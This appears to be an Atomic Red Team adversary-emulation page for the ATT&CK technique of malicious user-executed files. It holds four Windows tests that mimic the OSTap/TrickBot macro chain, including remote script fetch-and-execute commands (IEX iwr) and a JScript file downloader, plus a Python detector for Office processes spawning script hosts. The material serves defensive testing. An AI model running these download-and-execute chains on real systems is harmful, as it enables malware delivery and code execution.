
User Execution: Malicious Link

Description from ATT&CK

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of Masquerading and Obfuscated Files or Information to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs)

While Malicious File frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after Internal Spearphishing.

Atomic Tests

Atomic Test #1 - OSTap Style Macro Execution

This test uses a VBA macro to create and execute #{jse_path} with cscript.exe. Upon execution, the .jse file launches wscript.exe. Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.

This is a known execution chain observed in the OSTap downloader commonly used in TrickBot campaigns. Reference: https://www.computerweekly.com/news/252470091/TrickBot-Trojan-switches-to-stealthy-Ostap-downloader

Supported Platforms: windows

auto_generated_guid: 8bebc690-18c7-4549-bc98-210f7019efff

Inputs:

Name | Description | Type | Default Value
jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse
ms_product | Maldoc application (Word or Excel) | String | Word
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   Shell`$ `"cscript.exe #{jse_path}`"`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: This test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.

Check Prereq Commands:

If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

Atomic Test #2 - OSTap Payload Download

Uses cscript //E:jscript to download a file.

Supported Platforms: windows

auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80

Inputs:

Name | Description | Type | Default Value
script_file | File to execute jscript code from | Path | %TEMP%\OSTapGet.js
file_url | URL to retrieve file from | Url | https://128.30.52.100/TR/PNG/iso_8859-1.txt

Attack Commands: Run with command_prompt!

echo var url = "#{file_url}", fso = WScript.CreateObject('Scripting.FileSystemObject'), request, stream; request = WScript.CreateObject('MSXML2.ServerXMLHTTP'); request.open('GET', url, false); request.send(); if (request.status === 200) {stream = WScript.CreateObject('ADODB.Stream'); stream.Open(); stream.Type = 1; stream.Write(request.responseBody); stream.Position = 0; stream.SaveToFile(filename, 1); stream.Close();} else {WScript.Quit(1);}WScript.Quit(0); > #{script_file}
cscript //E:Jscript #{script_file}

Cleanup Commands:

del #{script_file} /F /Q >nul 2>&1

Atomic Test #3 - Maldoc choice flags command execution

This test uses a VBA macro to execute cmd.exe with flags observed in recent maldocs and second-stage downloaders. Upon execution, cmd.exe will be launched. Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.

Supported Platforms: windows

auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18

Inputs:

Name | Description | Type | Default Value
ms_product | Maldoc application (Word or Excel) | String | Word
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "  a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: This test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.

Check Prereq Commands:

If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD

Atomic Test #4 - OSTAP JS version

Malicious JScript executed through cmd.exe, which spawns wscript.exe //e:jscript.

Execution is handled by Invoke-MalDoc, which loads and executes the VBA code in an Excel or Word document.

Supported Platforms: windows

auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911

Inputs:

Name | Description | Type | Default Value
jse_path | .jse file to execute with wscript | Path | C:\Users\Public\art.jse
ms_product | Maldoc application (Word or Excel) | String | Word
ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office" | String | 16.0

Attack Commands: Run with powershell!

IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = "   Open `"#{jse_path}`" For Output As #1`n   Write #1, `"WScript.Quit`"`n   Close #1`n   a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"

Cleanup Commands:

if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore

Dependencies: Run with powershell!

Description: This test requires MS Office to be installed and to have been run previously. Run -GetPrereqs to launch Word and build the dependent registry keys.

Check Prereq Commands:

If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version}) { exit 0 } else { exit 1 }

Get Prereq Commands:

$msword = New-Object -ComObject word.application
Stop-Process -Name WINWORD
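All four tests above produce the same telemetry shape: an Office process (WINWORD.EXE or EXCEL.EXE) with cscript.exe, wscript.exe or cmd.exe somewhere below it in the process tree, sometimes one hop down (cmd.exe -> wscript.exe //E:jscript in test #4) and with tell-tale command lines (a .jse path, the //E:jscript engine override, the cmd.exe choice /T delay from test #3). The detection logic below is an added Python example, not part of Atomic Red Team or Invoke-MalDoc; the Sysmon-style process-creation records and their field names are constructed for the example.

```python
import re

# Process names the four atomic tests cause Word/Excel to spawn, directly or via cmd.exe.
OFFICE_APPS = {"winword.exe", "excel.exe"}
SCRIPT_HOSTS = {"cscript.exe", "wscript.exe", "cmd.exe"}

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmd": "WINWORD.EXE /n"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cscript.exe",
     "cmd": r"cscript.exe C:\Users\Public\art.jse"},                        # shape of test #1
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": "cmd.exe /c choice /C Y /N /D Y /T 3"},                          # shape of test #3
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd.exe /c wscript.exe //E:jscript C:\Users\Public\art.jse"},  # shape of test #4
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r"wscript.exe //E:jscript C:\Users\Public\art.jse"},            # test #4, grandchild
    {"pid": 600, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 700, "ppid": 600, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe"},  # benign
]

# Command-line traits seen in the tests; each one that matches adds a tag to the alert.
TRAITS = {
    "engine-override": re.compile(r"//e:jscript", re.I),
    "choice-delay": re.compile(r"\bchoice\b.*?/T\s*\d+", re.I),
    "jse-payload": re.compile(r"\.jse?\b", re.I),
}

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def find_office_script_chains(events, max_depth=5):
    """Flag script hosts (or cmd.exe) that descend from an Office process, walking up the
    parent chain so cmd.exe -> wscript.exe is caught too. Returns (pid, office, child, tags)."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        name = basename(e["image"])
        if name not in SCRIPT_HOSTS:
            continue
        ancestor, depth = by_pid.get(e["ppid"]), 0
        while ancestor is not None and depth < max_depth:
            if basename(ancestor["image"]) in OFFICE_APPS:
                tags = [t for t, rx in TRAITS.items() if rx.search(e["cmd"])]
                alerts.append((e["pid"], basename(ancestor["image"]), name, tags))
                break
            ancestor, depth = by_pid.get(ancestor["ppid"]), depth + 1
    return alerts
```

On real Sysmon Event ID 1 data, feed the ProcessId/ParentProcessId/Image/CommandLine fields into the same record shape; the explorer.exe -> cmd.exe pair in the sample is there to show that a shell with no Office ancestor is not flagged.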
